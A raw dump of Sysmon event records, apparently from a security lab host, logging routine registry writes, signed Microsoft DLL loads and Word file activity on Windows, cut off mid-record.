13241300x80000000000000001606742Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A225A5E4-F523-4E7D-8A84-CF07A6F8646E}\LastAccessedTimeQWORD (0x01d736e3-0x3422c910) 12241200x80000000000000001606741Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps 12241200x80000000000000001606740Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.089{21761711-83AE-607D-1600-00000000BB01}1108C:\Windows\system32\svchost.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\DeviceAccess 13241300x80000000000000001606739Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A225A5E4-F523-4E7D-8A84-CF07A6F8646E}\LaunchCountDWORD (0x00000016) 13241300x80000000000000001606738Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A225A5E4-F523-4E7D-8A84-CF07A6F8646E}\LastAccessedTimeQWORD (0x01d736e3-0x3422c910) 12241200x80000000000000001606737Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps 12241200x80000000000000001606736Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.089{21761711-83AE-607D-1600-00000000BB01}1108C:\Windows\system32\svchost.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\DeviceAccess 13241300x80000000000000001606735Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A225A5E4-F523-4E7D-8A84-CF07A6F8646E}\LaunchCountDWORD (0x00000016) 13241300x80000000000000001606734Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A225A5E4-F523-4E7D-8A84-CF07A6F8646E}\LastAccessedTimeQWORD (0x01d736e3-0x3422c910) 12241200x80000000000000001606733Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps 12241200x80000000000000001606732Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.089{21761711-83AE-607D-1600-00000000BB01}1108C:\Windows\system32\svchost.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\DeviceAccess 734700x80000000000000001606731Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.089{21761711-83AE-607D-1600-00000000BB01}1108C:\Windows\System32\svchost.exeC:\Windows\System32\deviceaccess.dll10.0.14393.4283 (rs1_release.210303-1802)Device Broker And Policy COM ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationDeviceAccess.dllMD5=BE5D6961F4736274AD28D2B2BAF0CF50,SHA256=177BF5B04802C472A158EC012FF03055E74FC7121F47DAE0D6BF0FD9579F6A1EtrueMicrosoft WindowsValid 10341000x80000000000000001606730Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.089{21761711-84C8-607D-EE00-00000000BB01}32603680C:\Windows\system32\taskhostw.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001606729Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\explorer.exeC:\Windows\System32\LocationFrameworkPS.dll10.0.14393.4169 (rs1_release.210107-1130)Windows Geolocation Framework PSMicrosoft® Windows® Operating SystemMicrosoft CorporationLocationFrameworkPS.dllMD5=9BA4CCDCED268D654794C53AD79F1402,SHA256=4778C3E478FC613C7B97FBCE5716F04F36CA665F643541841EB24A38B0AAB4A1trueMicrosoft WindowsValid 734700x80000000000000001606728Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.089{21761711-83AE-607D-1600-00000000BB01}1108C:\Windows\System32\svchost.exeC:\Windows\System32\LocationFrameworkPS.dll10.0.14393.4169 (rs1_release.210107-1130)Windows Geolocation Framework PSMicrosoft® Windows® Operating SystemMicrosoft CorporationLocationFrameworkPS.dllMD5=9BA4CCDCED268D654794C53AD79F1402,SHA256=4778C3E478FC613C7B97FBCE5716F04F36CA665F643541841EB24A38B0AAB4A1trueMicrosoft WindowsValid 734700x80000000000000001606727Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\explorer.exeC:\Windows\System32\deviceaccess.dll10.0.14393.4283 (rs1_release.210303-1802)Device Broker And Policy COM ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationDeviceAccess.dllMD5=BE5D6961F4736274AD28D2B2BAF0CF50,SHA256=177BF5B04802C472A158EC012FF03055E74FC7121F47DAE0D6BF0FD9579F6A1EtrueMicrosoft WindowsValid 13241300x80000000000000001606726Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001606725Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.RkcybereBinary Data 13241300x80000000000000001606724Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001606723Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Svyr Rkcybere (7).yaxBinary Data 13241300x80000000000000001606722Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001606721Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Svyr Rkcybere (7).yaxBinary Data 13241300x80000000000000001606720Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A225A5E4-F523-4E7D-8A84-CF07A6F8646E}\LaunchCountDWORD (0x00000015) 13241300x80000000000000001606719Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A225A5E4-F523-4E7D-8A84-CF07A6F8646E}\LastAccessedTimeQWORD (0x01d736e3-0x3422c910) 12241200x80000000000000001606718Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps 13241300x80000000000000001606717Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001606716Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.RkcybereBinary Data 13241300x80000000000000001606715Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001606714Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Svyr Rkcybere (7).yaxBinary Data 13241300x80000000000000001606713Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001606712Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Svyr Rkcybere (7).yaxBinary Data 734700x80000000000000001606711Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.086{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\explorer.exeC:\Windows\System32\synceng.dll10.0.14393.0 (rs1_release.160715-1616)Windows Briefcase EngineMicrosoft® Windows® Operating SystemMicrosoft CorporationSYNCENG.DLLMD5=A683B60F1A5FAC27D1173F937403ED1B,SHA256=57450827A7F7D880F236F27A1D92654A3284842226539A26F311CFA736083571trueMicrosoft WindowsValid 734700x80000000000000001606710Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.085{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\explorer.exeC:\Windows\System32\syncui.dll10.0.14393.2608 (rs1_release.181024-1742)Windows BriefcaseMicrosoft® Windows® Operating SystemMicrosoft CorporationSYNCUI.DLLMD5=D3CD7E690590A1AD564C832DFE1A1922,SHA256=F3CB2B362A0970B106D8B5F27F80D019931090D3ED579C72182163502BA212B7trueMicrosoft WindowsValid 13241300x80000000000000001606709Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.067{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation\LastOrientationDWORD (0x00000000) 12241200x80000000000000001606708Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.067{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation 734700x80000000000000001606707Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.067{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Windows\System32\DataExchange.dll10.0.14393.4169 (rs1_release.210107-1130)Data exchangeMicrosoft® Windows® Operating SystemMicrosoft CorporationDataExchange.dllMD5=23F499FA8F8E02A8090FB78E80617BDD,SHA256=08C2E505F3765D98379BB88DC8AD5555AB680A691054933FCA1A2CFCDFA42F51trueMicrosoft WindowsValid 734700x80000000000000001606706Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.067{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\explorer.exeC:\Windows\System32\twext.dll10.0.14393.4283 (rs1_release.210303-1802)Previous Versions property pageMicrosoft® Windows® Operating SystemMicrosoft Corporationtwext.dllMD5=52DA27C0F880437C2E6DA97516D68EDD,SHA256=D90E5DE35E53C01F57BD201D483A6E03C77F76C7BC497C83F85003F937779425trueMicrosoft WindowsValid 734700x80000000000000001606705Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.067{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Windows\System32\sxs.dll10.0.14393.4169 (rs1_release.210107-1130)Fusion 2.5Microsoft® Windows® Operating SystemMicrosoft CorporationSXS.DLLMD5=54FB18CA661D074CBB60D5A58D40C8D3,SHA256=A2BD6160222A216F8A6830C1273662F8AE88F53D2CE6DA5893FF70D146A0A2B0trueMicrosoft WindowsValid 12241200x80000000000000001606704Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.067{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKCR\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance 12241200x80000000000000001606703Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.067{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKCR\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance 13241300x80000000000000001606702Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.067{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\16.0\Common\Roaming\RoamingLastWriteTimeWordBinary Data 13241300x80000000000000001606701Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.067{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\16.0\Common\Roaming\RoamingLastSyncTimeWordBinary Data 11241100x80000000000000001606700Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.051{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat2021-04-19 12:25:39.474 23542300x80000000000000001606699Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.051{21761711-84C9-607D-F200-00000000BB01}3784WIN-HOST-5\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.datMD5=58FDE1A71D2ADB272DABB3A92B406559,SHA256=555933C7D5D49EBF3648EE1EF420E0C71835139B8A8DEF8FBA64C9EBE48B0C32falsefalse - insufficient disk space 13241300x80000000000000001606698Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.051{21761711-84C6-607D-E500-00000000BB01}2532C:\Windows\system32\dwm.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\PUUActiveBinary Data 254200x80000000000000001606871Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.856{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\ADMINI~1\AppData\Local\Temp\2\Diagnostics\WINWORD\App_1619027401671195500_A6DFB4F7-B699-43CE-B9A9-C61D0BE35D08.log2021-04-21 17:50:01.6562021-04-21 17:50:01.656 13241300x80000000000000001606870Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:10.856{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000A062E\VirtualDesktopBinary Data 12241200x80000000000000001606869Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:10.856{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000A062E 11241100x80000000000000001606868Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.CampaignStates.json2021-04-19 17:20:23.952 23542300x80000000000000001606867Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348WIN-HOST-5\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.CampaignStates.jsonMD5=E7535DE8EE1BE5E7688A85EEFB39FFCD,SHA256=FC09B09EEB8A945EC71EBD641C7E330A37065444F9E33998DA2C69FAB2FB34B4falsefalse - insufficient disk space 13241300x80000000000000001606866Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\3348\0Binary Data 11241100x80000000000000001606865Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.GovernedChannelStates.json2021-04-19 17:20:23.952 23542300x80000000000000001606864Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348WIN-HOST-5\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.GovernedChannelStates.jsonMD5=6D84CEE6D5BB054054BE87D1056E8D95,SHA256=2A25607260860071A6C809F63DF347A83424DAA3386FCC0239024481460A2D1Efalsefalse - insufficient disk space 11241100x80000000000000001606863Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.SurveyHistoryStats.json2021-04-19 17:20:23.952 23542300x80000000000000001606862Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348WIN-HOST-5\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.SurveyHistoryStats.jsonMD5=536AD5104BF69553F6798611F34928AB,SHA256=FC9F0B5E89246B67178A66C1B6FDF68F07F24549D53592B098C1DDDAE63EA726falsefalse - insufficient disk space 11241100x80000000000000001606861Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.CampaignStates.json2021-04-19 17:20:23.952 23542300x80000000000000001606860Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348WIN-HOST-5\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.CampaignStates.jsonMD5=E7535DE8EE1BE5E7688A85EEFB39FFCD,SHA256=FC09B09EEB8A945EC71EBD641C7E330A37065444F9E33998DA2C69FAB2FB34B4falsefalse - insufficient disk space 11241100x80000000000000001606859Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.SurveyEventActivityStats.json2021-04-19 17:20:23.952 23542300x80000000000000001606858Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348WIN-HOST-5\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.SurveyEventActivityStats.jsonMD5=6CA4960355E4951C72AA5F6364E459D5,SHA256=88301F0B7E96132A2699A8BCE47D120855C7F0A37054540019E3204D6BCBABA3falsefalse - insufficient disk space 11241100x80000000000000001606857Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.Settings.json2021-04-19 17:20:23.952 23542300x80000000000000001606856Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348WIN-HOST-5\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.Settings.jsonMD5=E4E83F8123E9740B8AA3C3DFA77C1C04,SHA256=6034F27B0823B2A6A76FE296E851939FD05324D0AF9D55F249C79AF118B0EB31falsefalse - insufficient disk space 13241300x80000000000000001606855Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\3348\0Binary Data 23542300x80000000000000001606854Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348WIN-HOST-5\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{347A3A16-2659-4988-B61C-C2F5CEC54D2E}.tmpMD5=5D4D94EE7E06BBB0AF9584119797B23A,SHA256=4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1falsefalse - insufficient disk space 23542300x80000000000000001606853Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348WIN-HOST-5\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Templates\~$Normal.dotmMD5=56B4F3D291EC004428BF2ED9552A3818,SHA256=3FD6C5A2122B7746D110F32071EC9EC208E74C097CB9367CD84FCC9E50376BD3falsefalse - insufficient disk space 13241300x80000000000000001606852Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\3348\0Binary Data 12241200x80000000000000001606851Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-DeleteKey2021-04-21 19:19:10.840{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000A062E 13241300x80000000000000001606850Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\3348\0Binary Data 13241300x80000000000000001606849Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 